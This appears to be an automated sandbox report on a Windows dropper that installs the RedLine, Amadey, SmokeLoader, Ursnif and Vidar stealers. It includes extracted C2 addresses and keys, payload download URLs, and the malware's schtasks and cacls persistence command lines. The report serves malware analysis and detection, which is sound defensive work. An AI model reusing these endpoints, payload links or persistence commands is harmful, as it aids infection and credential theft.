Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
S2XJ2wbz7u.exe

Overview

General Information

Sample Name:S2XJ2wbz7u.exe
Analysis ID:749806
MD5:ffb4cf34b38f126c917e1c1e1d26df73
SHA1:36e558fdb10418aa971aea3f02d6ba1f4d566ed2
SHA256:4a47fdbb09dd09ea813c0475d32f693cbbded09b3753def43179f91e1a8f8a55
Tags:exeRedLineStealer
Infos:

Detection

Ursnif, Amadey, RedLine, SmokeLoader, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Opens the same file many times (likely Sandbox evasion)
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Connects to a URL shortener service
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file contains an invalid checksum
Uses cacls to modify the permissions of files
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • S2XJ2wbz7u.exe (PID: 6020 cmdline: C:\Users\user\Desktop\S2XJ2wbz7u.exe MD5: FFB4CF34B38F126C917E1C1E1D26DF73)
    • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 2B4A.exe (PID: 5260 cmdline: C:\Users\user\AppData\Local\Temp\2B4A.exe MD5: 2DEE200193091BE2F2321D921750C4ED)
      • 3790.exe (PID: 2336 cmdline: C:\Users\user\AppData\Local\Temp\3790.exe MD5: 5E08968D858224A33175069D64DC7F39)
        • rovwer.exe (PID: 4764 cmdline: "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" MD5: 5E08968D858224A33175069D64DC7F39)
          • schtasks.exe (PID: 1396 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5972 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cmd.exe (PID: 3012 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • cacls.exe (PID: 4392 cmdline: CACLS "rovwer.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cacls.exe (PID: 4984 cmdline: CACLS "rovwer.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cmd.exe (PID: 5640 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • cacls.exe (PID: 5668 cmdline: CACLS "..\99e342142d" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cacls.exe (PID: 3124 cmdline: CACLS "..\99e342142d" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
      • 453D.exe (PID: 4024 cmdline: C:\Users\user\AppData\Local\Temp\453D.exe MD5: F96144B1D5B53D93CAADDDADE38DB5E9)
      • 59FE.exe (PID: 5228 cmdline: C:\Users\user\AppData\Local\Temp\59FE.exe MD5: 44A7E13ECC55CE9797C5121B230D9927)
      • 6644.exe (PID: 1916 cmdline: C:\Users\user\AppData\Local\Temp\6644.exe MD5: 19A79DADDFAAC09499E79ADE27E756F8)
      • 6CEC.exe (PID: 4968 cmdline: C:\Users\user\AppData\Local\Temp\6CEC.exe MD5: 28A6112DCB54CE6886F7D9ACB8A15E31)
        • conhost.exe (PID: 408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • vbc.exe (PID: 5496 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
      • 816F.exe (PID: 1172 cmdline: C:\Users\user\AppData\Local\Temp\816F.exe MD5: 730A7A6F235525238EE33A2C046C2BA7)
      • 86EE.exe (PID: 4972 cmdline: C:\Users\user\AppData\Local\Temp\86EE.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)
        • 86EE.exe (PID: 5560 cmdline: C:\Users\user\AppData\Local\Temp\86EE.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)
          • 86EE.exe (PID: 5068 cmdline: C:\Users\user\AppData\Local\Temp\86EE.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)
      • 8C00.exe (PID: 5400 cmdline: C:\Users\user\AppData\Local\Temp\8C00.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)
        • 8C00.exe (PID: 5936 cmdline: C:\Users\user\AppData\Local\Temp\8C00.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)
      • explorer.exe (PID: 5612 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5928 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 1768 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5080 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 3780 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • tiddsjj (PID: 3152 cmdline: C:\Users\user\AppData\Roaming\tiddsjj MD5: FFB4CF34B38F126C917E1C1E1D26DF73)
  • rovwer.exe (PID: 2560 cmdline: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe MD5: 5E08968D858224A33175069D64DC7F39)
  • cleanup
{"C2 url": "185.106.92.111:2510", "Bot Id": "New2022", "Authorization Header": "ef6fe7baf59e3191ff2f569e3bf0e2c7"}
{"RSA Public Key": "9YTR8AStfTOVxekPy7nye/rJL/CYnuMKiTBMit/N9dFJomCZQw3gdJ20hYjZiaY5PCNTRgc/z2gXfPlfCRRq0/mF+oSBOgliUoJHNN6O1Nl/zAv1hC+MVoITbvAJoj6LnOzFs9h/l3E4DMphz+dHiiDgppDXx4StPfi30EoQByvOIhjndZV3g8kYMJyGj8dxlmi3X9wSz6RHT9/HWCOS/i2phbREwr7oohHwh6mObxVhJVx0tZ18f2U+SsDunGdf1nLcyWHfM0cx6e8zBNRaXlZ1HhTEFzQdz5EF2h+r74n2bFODhb+ozhtKQ1CBEf0hf+5D8mLZuH2C+VOO+s90bjJxpTvGseErYwzAwE2lC4o=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "20", "server": "50", "serpent_key": "izoHlMTDxrB6IFB3", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
{"C2 list": ["http://o3l3roozuidudu.com/", "http://o3npxslymcyfi2.com/", "http://o3b1wk8sfk74tf.com/"]}
{"C2 url": ["https://t.me/deadftx", "https://www.tiktok.com/@user6068972597711"], "Botnet": "1148", "Version": "55.7"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllINDICATOR_TOOL_PWS_AmadyDetects password stealer DLL. Dropped by AmadeyditekSHen
          • 0xd86c:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
          • 0x15608:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
          • 0x16078:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
          • 0x1515c:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          • 0x151c0:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          • 0xdd10:$s3: \Mikrotik\Winbox\Addresses.cdb
          • 0x190dc:$s4: \HostName
          • 0x19104:$s5: \Password
          • 0x17c08:$s6: SOFTWARE\RealVNC\
          • 0x17c34:$s6: SOFTWARE\RealVNC\
          • 0x17c60:$s6: SOFTWARE\RealVNC\
          • 0x17ca8:$s6: SOFTWARE\RealVNC\
          • 0x17cd4:$s6: SOFTWARE\RealVNC\
          • 0x1800c:$s7: SOFTWARE\TightVNC\
          • 0x18038:$s7: SOFTWARE\TightVNC\
          • 0x18064:$s7: SOFTWARE\TightVNC\
          • 0x180b0:$s7: SOFTWARE\TightVNC\
          • 0x1c43c:$s8: cred.dll
          C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllINDICATOR_TOOL_PWS_AmadyDetects password stealer DLL. Dropped by AmadeyditekSHen
            • 0xd86c:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
            • 0x15608:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
            • 0x16078:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
            • 0x1515c:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
            • 0x151c0:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
            • 0xdd10:$s3: \Mikrotik\Winbox\Addresses.cdb
            • 0x190dc:$s4: \HostName
            • 0x19104:$s5: \Password
            • 0x17c08:$s6: SOFTWARE\RealVNC\
            • 0x17c34:$s6: SOFTWARE\RealVNC\
            • 0x17c60:$s6: SOFTWARE\RealVNC\
            • 0x17ca8:$s6: SOFTWARE\RealVNC\
            • 0x17cd4:$s6: SOFTWARE\RealVNC\
            • 0x1800c:$s7: SOFTWARE\TightVNC\
            • 0x18038:$s7: SOFTWARE\TightVNC\
            • 0x18064:$s7: SOFTWARE\TightVNC\
            • 0x180b0:$s7: SOFTWARE\TightVNC\
            • 0x1c43c:$s8: cred.dll
            SourceRuleDescriptionAuthorStrings
            0000000B.00000002.378510967.0000000000930000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
            • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
            00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
            • 0x34:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
            0000000B.00000002.378663629.0000000000B41000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
            • 0x7aa8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
            00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000013.00000002.535069692.0000000000B01000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
              • 0x6f64:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
              Click to see the 62 entries
              SourceRuleDescriptionAuthorStrings
              11.2.tiddsjj.930e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                12.2.2B4A.exe.2840000.6.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  12.2.2B4A.exe.2840000.6.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x34f0e:$pat14: , CommandLine:
                  • 0x23dd6:$v2_1: ListOfProcesses
                  • 0x2228c:$v4_3: base64str
                  • 0x2224b:$v4_4: stringKey
                  • 0x22296:$v4_5: BytesToStringConverted
                  • 0x22281:$v4_6: FromBase64
                  • 0x23a93:$v4_8: procName
                  • 0x20e54:$v5_1: DownloadAndExecuteUpdate
                  • 0x20e7c:$v5_2: ITaskProcessor
                  • 0x20e42:$v5_3: CommandLineUpdate
                  • 0x20e6d:$v5_4: DownloadUpdate
                  • 0x20db6:$v5_5: FileScanning
                  • 0x21054:$v5_7: RecordHeaderField
                  • 0x20f7e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                  11.3.tiddsjj.950000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    12.2.2B4A.exe.400000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      Click to see the 40 entries
                      No Sigma rule has matched
                      Timestamp:192.168.2.377.232.37.22849729802851815 11/19/22-10:38:14.789628
                      SID:2851815
                      Source Port:49729
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.377.232.37.22849733802851815 11/19/22-10:38:20.903452
                      SID:2851815
                      Source Port:49733
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.377.232.37.22849725802851815 11/19/22-10:38:10.657737
                      SID:2851815
                      Source Port:49725
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.389.208.107.21649738802018581 11/19/22-10:38:23.294845
                      SID:2018581
                      Source Port:49738
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: http://91.213.50.70/Wavafursq.jpegAvira URL Cloud: Label: malware
                      Source: http://116.202.5.101:80Avira URL Cloud: Label: malware
                      Source: http://193.56.146.174/g84kvj4jck/index.php?scr=1kvj4jck/index.phpAvira URL Cloud: Label: malware
                      Source: http://193.56.146.174/g84kvj4jck/index.php?scr=1Avira URL Cloud: Label: malware
                      Source: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllmingAvira URL Cloud: Label: malware
                      Source: http://193.56.146.168/mia/solt.exeAvira URL Cloud: Label: malware
                      Source: http://91.213.50.70/Wavafursq.jpeg&BKl:Avira URL Cloud: Label: malware
                      Source: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dlltEAvira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllAvira: detection malicious, Label: HEUR/AGEN.1233121
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllAvira: detection malicious, Label: HEUR/AGEN.1233121
                      Source: o36fafs3sn6xou.comVirustotal: Detection: 15%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllReversingLabs: Detection: 88%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllMetadefender: Detection: 71%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeReversingLabs: Detection: 73%
                      Source: C:\Users\user\AppData\Local\Temp\453D.exeReversingLabs: Detection: 20%
                      Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllReversingLabs: Detection: 88%
                      Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllMetadefender: Detection: 71%Perma Link
                      Source: S2XJ2wbz7u.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\3790.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\tiddsjjJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\6CEC.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\453D.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\59FE.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\6644.exeJoe Sandbox ML: detected
                      Source: 21.3.6CEC.exe.6c0000.0.unpackAvira: Label: TR/Downloader.Gen2
                      Source: 19.3.6644.exe.940000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 19.2.6644.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                      Source: 19.2.6644.exe.930e67.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://t.me/deadftx", "https://www.tiktok.com/@user6068972597711"], "Botnet": "1148", "Version": "55.7"}
                      Source: 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "185.106.92.111:2510", "Bot Id": "New2022", "Authorization Header": "ef6fe7baf59e3191ff2f569e3bf0e2c7"}
                      Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://o3l3roozuidudu.com/", "http://o3npxslymcyfi2.com/", "http://o3b1wk8sfk74tf.com/"]}
                      Source: 00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "9YTR8AStfTOVxekPy7nye/rJL/CYnuMKiTBMit/N9dFJomCZQw3gdJ20hYjZiaY5PCNTRgc/z2gXfPlfCRRq0/mF+oSBOgliUoJHNN6O1Nl/zAv1hC+MVoITbvAJoj6LnOzFs9h/l3E4DMphz+dHiiDgppDXx4StPfi30EoQByvOIhjndZV3g8kYMJyGj8dxlmi3X9wSz6RHT9/HWCOS/i2phbREwr7oohHwh6mObxVhJVx0tZ18f2U+SsDunGdf1nLcyWHfM0cx6e8zBNRaXlZ1HhTEFzQdz5EF2h+r74n2bFODhb+ozhtKQ1CBEf0hf+5D8mLZuH2C+VOO+s90bjJxpTvGseErYwzAwE2lC4o=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "20", "server": "50", "serpent_key": "izoHlMTDxrB6IFB3", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

                      Compliance

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeUnpacked PE file: 12.2.2B4A.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\3790.exeUnpacked PE file: 13.2.3790.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeUnpacked PE file: 15.2.rovwer.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\6644.exeUnpacked PE file: 19.2.6644.exe.400000.0.unpack
                      Source: S2XJ2wbz7u.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 108.167.141.212:443 -> 192.168.2.3:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 148.251.234.93:443 -> 192.168.2.3:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 195.96.151.51:443 -> 192.168.2.3:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49717 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49720 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.217.206.73:443 -> 192.168.2.3:49721 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49728 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 43.231.112.109:443 -> 192.168.2.3:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 195.96.151.53:443 -> 192.168.2.3:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49742 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 195.216.243.155:443 -> 192.168.2.3:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49749 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49806 version: TLS 1.2
                      Source: Binary string: C:\lulubob99\yu.pdb source: 3790.exe, 0000000D.00000000.396647319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, rovwer.exe, 0000000F.00000000.410516994.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000002.519144240.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000000.438994801.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 3790.exe.1.dr, rovwer.exe.13.dr
                      Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 3790.exe, 0000000D.00000002.412472703.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, 3790.exe, 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, 3790.exe, 0000000D.00000003.404528480.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.520940016.0000000000400000.00000040.00000001.01000000.0000000D.sdmp
                      Source: Binary string: C:\cekezuca_v.pdb source: 6644.exe, 00000013.00000000.423486676.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, 6644.exe.1.dr
                      Source: Binary string: /.pdb source: 2B4A.exe, 0000000C.00000002.517632493.0000000000197000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: ?C:\lulubob99\yu.pdbQ source: 3790.exe, 0000000D.00000000.396647319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, rovwer.exe, 0000000F.00000000.410516994.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000002.519144240.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000000.438994801.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 3790.exe.1.dr, rovwer.exe.13.dr
                      Source: Binary string: _.pdb source: 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\Administrator\Desktop\android.annotation.TestApi.module1 - Copy.pdb source: 816F.exe, 0000001A.00000000.437232628.0000000000192000.00000002.00000001.01000000.00000011.sdmp, 816F.exe.1.dr
                      Source: Binary string: (P&gHC:\Windows\System.ServiceModel.pdb source: 2B4A.exe, 0000000C.00000002.517632493.0000000000197000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\tahaf\to.pdbQ source: S2XJ2wbz7u.exe, tiddsjj.1.dr
                      Source: Binary string: C:\tahaf\to.pdb source: S2XJ2wbz7u.exe, tiddsjj.1.dr
                      Source: Binary string: SC:\vum\nuzuyo.pdb source: 2B4A.exe, 0000000C.00000000.390215303.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 2B4A.exe.1.dr
                      Source: Binary string: C:\vum\nuzuyo.pdb source: 2B4A.exe, 0000000C.00000000.390215303.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 2B4A.exe.1.dr
                      Source: Binary string: @C:\cekezuca_v.pdb source: 6644.exe, 00000013.00000000.423486676.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, 6644.exe.1.dr
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

                      Networking

                      barindex
                      Source: C:\Windows\explorer.exeDomain query: cdn-102.anonfiles.com
                      Source: C:\Windows\explorer.exeDomain query: bitbucket.org
                      Source: C:\Windows\explorer.exeDomain query: bbuseruploads.s3.amazonaws.com
                      Source: C:\Windows\explorer.exeDomain query: u.to
                      Source: C:\Windows\explorer.exeDomain query: github.com
                      Source: C:\Windows\explorer.exeDomain query: raw.githubusercontent.com
